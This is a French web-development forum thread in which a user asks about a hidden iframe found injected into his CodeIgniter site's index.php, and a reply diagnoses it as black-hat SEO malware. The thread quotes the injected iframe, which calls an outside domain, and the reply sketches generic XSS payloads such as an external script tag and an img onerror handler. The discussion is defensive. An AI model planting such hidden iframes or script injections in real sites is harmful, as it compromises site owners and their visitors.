IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langages serveur Discussion :

Iframe bizarre hack ou pas ?


Sujet :

Langages serveur

  1. #1
    Expert confirmé
    Avatar de Aspic
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2005
    Messages
    3 905
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Hauts de Seine (Île de France)

    Informations professionnelles :
    Activité : Étudiant
    Secteur : High Tech - Électronique et micro-électronique

    Informations forums :
    Inscription : Août 2005
    Messages : 3 905
    Points : 4 388
    Points
    4 388
    Par défaut Iframe bizarre hack ou pas ?
    Bonjour,

    Déjà désolé mais je ne sais pas du tout ou poster ce genre de topic

    Sur mon framework Codeigniter, j'ai l'impression qu'une injection de code a été faite sur un seul fichier index.php à la racine :
    <iframe style="visibility: hidden; display: none; display: none;" src="http://dartmouthcrusaders.org/referer.php?id={DF5674DB-D85C-4ED0-8055-3CB0ABD596EF}"></iframe>
    J'ai regardé sur le net mais aucune information sur le site en question.
    J'ai bien un antivirus qui n'a rien dit... et quand je vais sur le site en question (je suis fou je sais), le site a l'air normal et avast ne dit rien.

    Je voulais savoir si quelqu'un avait plus d'informations sur ce code bizarre ?

    Merci beaucoup.
    Qui ne tente rien n'a rien !
    Ce qui ne nous tue pas nous rends plus fort !!
    Mon projet ZELDA en C++/Allegro
    http://www.tutoworld.com - Le Forum -
    Mes ressources Dotnet (cours, sources, tutos)
    --------------------------------------------
    + + =

    Ne pas oublier le Tag !

  2. #2
    Membre actif
    Profil pro
    Inscrit en
    Janvier 2007
    Messages
    327
    Détails du profil
    Informations personnelles :
    Localisation : France, Gironde (Aquitaine)

    Informations forums :
    Inscription : Janvier 2007
    Messages : 327
    Points : 204
    Points
    204
    Par défaut
    Bonjour,
    Si une solution t'interresse encore vu la date du post...
    Je ne pense pas qu'il puisse s'agir d'une veritable attaque XSS persistante vu que l'iframe pointe vers un domaine différent et une vrai attaque XSS serait
    <script src=monattaque.com/attaque.js></script> ou <img src=xxx.jpg onerror=code js pour generer une insertion de script> et là on est dans le même domaine.
    De plus as tu une possibilité sur ton site un livre d'or (avec du bb code mauvais)etc etc voir un compte admin qui une fois forcé autorise d'insérer du code HTML pour insérer une banniere de pub par exemple?
    Ton frameword est visiblement sécurisé contre les xss mais j'ai vu des framework trés connus en javascript avoir des failles ....
    ça fait penser à un script de pub via une barre d'outil ajouté
    Visiblement la variable referer et sa valeur (je ne crois pas que c du code js encodé en hexa etc) sont faite pour voir que c'est ton site
    Je pense qu'il s'agit d'un maleware ayant pour but qu'un maximum de liens pointent vers le site en question des methodes de black hat pour optimiser le referencement(en depit de Pingouin...)

    D'ailleurs regarde ça...
    http://evuln.com/tools/malware-scann...ungwindow.com/ et ça
    http://www.anti-webscam.com/www-dart...am_report.html
    Maintenant tu dois trouver comment ils injectent le code ....

Discussions similaires

  1. Iframe ne s'affiche pas correctement avec Internet Explorer
    Par luffyfr dans le forum Balisage (X)HTML et validation W3C
    Réponses: 9
    Dernier message: 29/06/2011, 11h17
  2. Réponses: 3
    Dernier message: 23/10/2010, 02h55
  3. des bords autour de iframe qui ne veullent pas partir
    Par Alexandrebox dans le forum Balisage (X)HTML et validation W3C
    Réponses: 1
    Dernier message: 12/04/2010, 20h08
  4. Réponses: 1
    Dernier message: 28/10/2005, 12h13
  5. image dans une iframe div qui ne s'efface pas
    Par Invité(e) dans le forum Balisage (X)HTML et validation W3C
    Réponses: 1
    Dernier message: 26/10/2005, 11h19

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo